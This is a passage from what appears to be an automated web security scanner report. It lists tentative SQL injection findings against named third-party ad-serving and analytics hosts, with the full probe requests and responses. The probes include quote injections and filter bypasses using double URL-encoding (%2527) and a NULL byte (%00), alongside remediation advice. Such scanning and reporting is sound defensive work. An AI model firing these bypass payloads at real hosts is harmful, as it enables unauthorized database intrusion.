NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00'&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:46 GMT
Content-Length: 2041
Connection: close
Set-Cookie: vf=802; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_N4UEGwHAZheP%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00''&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:47 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224067319; Domain=.contextweb.com; Path=/
Set-Cookie: vf=803; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...
|
1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The esid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid='&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2041
Date: Sat, 17 Sep 2011 01:47:50 GMT
Connection: close
Set-Cookie: vf=806; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app208_1c4prRRFRDCJ%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=''&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:51 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224071201; Domain=.contextweb.com; Path=/
Set-Cookie: vf=807; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...
|
1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The pb_rtb_ev cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pb_rtb_ev cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pb_rtb_ev cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:19:16 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=592; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app203_AjrHJFvs9xWj%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2372
Date: Sat, 17 Sep 2011 01:19:17 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222357255; Domain=.contextweb.com; Path=/
Set-Cookie: vf=593; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...
|
1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://tag.contextweb.com |
| Path: |
/TagPublish/GetAd.aspx |
Issue detail
The pxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pxy request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 1
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:39 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=529; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_3NkTLnCH1peq%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...
|
Request 2
GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076
|
Response 2
HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:39 GMT
Content-Length: 1846
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222319958; Domain=.contextweb.com; Path=/
Set-Cookie: vf=530; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/
document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...
|
1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://w88.go.com |
| Path: |
/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /b/ss/wdgabccom,wdgasec%00'/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B
|
Response 1
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:16:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgabccom,wdgasec was not found on this server.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...
|
Request 2
